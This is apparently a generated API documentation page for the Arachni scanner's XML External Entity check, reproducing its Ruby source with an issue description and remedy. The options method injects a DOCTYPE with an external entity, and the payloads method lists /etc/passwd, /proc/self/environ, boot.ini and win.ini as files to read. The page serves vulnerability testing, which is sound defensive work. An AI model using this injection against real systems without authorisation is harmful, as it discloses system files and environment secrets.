Class: Arachni::Checks::Xxe

# File 'components/checks/active/xxe.rb', line 56

def self.info
    {
        name:        'XML External Entity',
        description: %q{
Injects a custom External Entity into XML documents prior to submitting them and
determines the existence of a vulnerability by checking whether that entity was
processed based on the resulting HTTP response.
},
        elements:    [Element::XML],
        author:      'Tasos "Zapotek" Laskos <[email protected]>',
        version:     '0.1.2',
        platforms:   options[:signatures].keys,

        issue:       {
            name:            %q{XML External Entity},
            description:     %q{
An XML External Entity attack is a type of attack against an application that
parses XML input.

This attack occurs when XML input containing a reference to an external entity is
processed by a weakly configured XML parser.

This attack may lead to the disclosure of confidential data, denial of service,
port scanning from the perspective of the machine where the parser is located,
and other system impacts.
},
            references:      {
                'OWASP' => 'https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing'
            },
            cwe:             611,
            severity:        Severity::HIGH,
            remedy_guidance: %q{
Since the whole XML document is communicated from an untrusted client, it's not
usually possible to selectively validate or escape tainted data within the system
identifier in the DTD.

Therefore, the XML processor should be configured to use a local static DTD and
disallow any declared DTD included in the XML document.
}
        }
    }
end

.options ⇒ `Object`

# File 'components/checks/active/xxe.rb', line 14

def self.options
    @options ||= {
        format:        [Format::STRAIGHT],
        signatures:    FILE_SIGNATURES_PER_PLATFORM.select { |k, _| payloads.include? k },
        each_mutation: proc do |mutation|
            mutation.platforms.pick( payloads ).map do |platform, payloads|
                payloads.map do |payload|
                    m = mutation.dup

                    m.transform_xml do |xml|
                        xml.sub( m.affected_input_value, "&#{ENTITY};" )
                    end

                    m.audit_options[:platform] = platform
                    m.source = "<!DOCTYPE #{ENTITY} [ <!ENTITY #{ENTITY} SYSTEM \"#{payload}\"> ]>\n#{m.source}"
                    m
                end
            end
        end
    }
end

.payloads ⇒ `Object`

# File 'components/checks/active/xxe.rb', line 36

def self.payloads
    @payloads ||= {
        unix:    [
            '/proc/self/environ',
            '/etc/passwd'
        ],
        windows: [
            '%SYSTEMDRIVE%\boot.ini',
            '%WINDIR%\win.ini'
        ]
    }
end

Instance Method Details

#run ⇒ `Object`

# File 'components/checks/active/xxe.rb', line 49

def run
    # We can't inject entities because they're going to get sanitized,
    # instead we inject a placeholder which we can later replace via a
    # regular text substitution.
    audit random_seed, self.class.options
end

Class: Arachni::Checks::Xxe

Overview

Constant Summary collapse

Constants included from Arachni::Check::Auditor

Constants included from Arachni

Instance Attribute Summary

Attributes included from Arachni::Check::Auditor

Class Method Summary collapse

Instance Method Summary collapse

Methods inherited from Arachni::Check::Base

Methods included from Arachni::Check::Auditor

Methods inherited from Arachni::Component::Base

Methods included from Arachni::Component::Output

Methods included from UI::Output

Methods included from Arachni::Component::Utilities

Methods included from Utilities

Methods included from Arachni

Constructor Details

Class Method Details

.info ⇒ Object

.options ⇒ Object

.payloads ⇒ Object

Instance Method Details

#run ⇒ Object

.info ⇒ `Object`

.options ⇒ `Object`

.payloads ⇒ `Object`

#run ⇒ `Object`